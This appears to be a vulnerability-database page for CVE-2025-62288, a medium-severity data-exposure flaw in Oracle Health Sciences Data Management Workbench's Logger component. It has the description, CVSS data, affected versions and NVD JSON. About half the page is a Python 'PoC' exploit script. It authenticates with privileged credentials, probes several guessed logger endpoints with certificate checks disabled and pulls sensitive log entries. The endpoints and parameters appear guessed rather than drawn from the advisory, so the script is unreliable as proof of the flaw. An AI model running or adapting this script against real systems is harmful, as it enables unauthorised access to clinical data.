CVE-2025-62288

Description

Vulnerability in the Oracle Health Sciences Data Management Workbench product of Oracle Health Sciences Applications (component: Logger). Supported versions that are affected are 3.4.0.1.3 and 3.4.1.0.10. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Health Sciences Data Management Workbench. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Health Sciences Data Management Workbench accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:health_sciences_data_management_workbench:3.4.0.1.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:oracle:health_sciences_data_management_workbench:3.4.1.0.10:*:*:*:*:*:*:* - VULNERABLE

Oracle Health Sciences Data Management Workbench 3.4.0.1.3

Oracle Health Sciences Data Management Workbench 3.4.1.0.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62288 - Oracle Health Sciences Data Management Workbench Logger Component PoC
# Vulnerability: Unauthorized Data Access via Logger Component
# CVSS: 4.9 (Medium) - AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

import requests
from requests.auth import HTTPBasicAuth

TARGET_URL = "https://target-oracle-health-sciences.example.com"
# Requires high-privileged credentials (PR:H)
USERNAME = "high_priv_user"
PASSWORD = "password123"

class OracleLoggerExploit:
    """
    PoC for CVE-2025-62288
    Exploits unauthorized data access in Oracle Health Sciences
    Data Management Workbench Logger component.
    """

    def __init__(self, base_url, username, password):
        self.base_url = base_url
        self.session = requests.Session()
        self.session.auth = HTTPBasicAuth(username, password)
        self.session.headers.update({
            "User-Agent": "Mozilla/5.0 (compatible; OracleHealthClient)",
            "Accept": "application/json, text/plain, */*"
        })

    def check_vulnerability(self):
        """Check if the target is vulnerable by probing the Logger endpoint."""
        logger_endpoints = [
            "/healthsci/dmw/logger/api/logs",
            "/healthsci/dmw/logger/api/audit",
            "/healthsci/dmw/logger/api/events",
            "/healthsci/dmw/api/logger/logs",
            "/dmw/logger/logs"
        ]

        for endpoint in logger_endpoints:
            url = f"{self.base_url}{endpoint}"
            try:
                resp = self.session.get(url, timeout=10, verify=False)
                if resp.status_code == 200:
                    print(f"[+] Logger endpoint accessible: {endpoint}")
                    return endpoint, resp
            except requests.exceptions.RequestException as e:
                continue

        return None, None

    def exploit_logger_access(self, endpoint):
        """
        Attempt to access unauthorized log data via the Logger component.
        The vulnerability allows high-privileged users to access data
        beyond their intended permission scope.
        """
        url = f"{self.base_url}{endpoint}"
        params = {
            "level": "ALL",
            "category": "ALL",
            "includeSensitive": "true",
            "maxResults": 1000
        }

        try:
            resp = self.session.get(url, params=params, timeout=30, verify=False)
            if resp.status_code == 200:
                data = resp.json()
                print(f"[+] Retrieved {len(data.get('logs', []))} log entries")
                print("[!] Sensitive data may be exposed in log entries")
                return data
        except Exception as e:
            print(f"[-] Exploitation failed: {e}")

        return None

    def run(self):
        print(f"[*] Targeting: {self.base_url}")
        print(f"[*] CVE-2025-62288 - Oracle Health Sciences DMW Logger Exploit")

        endpoint, response = self.check_vulnerability()
        if endpoint:
            print(f"[+] Target appears vulnerable. Logger endpoint: {endpoint}")
            data = self.exploit_logger_access(endpoint)
            if data:
                print("[!] Unauthorized data access confirmed!")
        else:
            print("[-] Target does not appear to be vulnerable or is not accessible.")


if __name__ == "__main__":
    exploit = OracleLoggerExploit(TARGET_URL, USERNAME, PASSWORD)
    exploit.run()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62288
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62288
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62288/
[4] VulDB https://vuldb.com/cve/CVE-2025-62288
[5] https://www.oracle.com/security-alerts/cpuoct2025.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62288", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:53.757", "lastModified": "2025-10-24T13:19:50.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Health Sciences Data Management Workbench product of Oracle Health Sciences Applications (component: Logger). Supported versions that are affected are 3.4.0.1.3 and 3.4.1.0.10. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Health Sciences Data Management Workbench. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Health Sciences Data Management Workbench accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:health_sciences_data_management_workbench:3.4.0.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "F2A5A16C-B455-479B-9AAF-0DFE565CC37D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:health_sciences_data_management_workbench:3.4.1.0.10:*:*:*:*:*:*:*", "matchCriteriaId": "065B54EE-EFF8-49EA-8B86-DEF0ED5B4E27"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}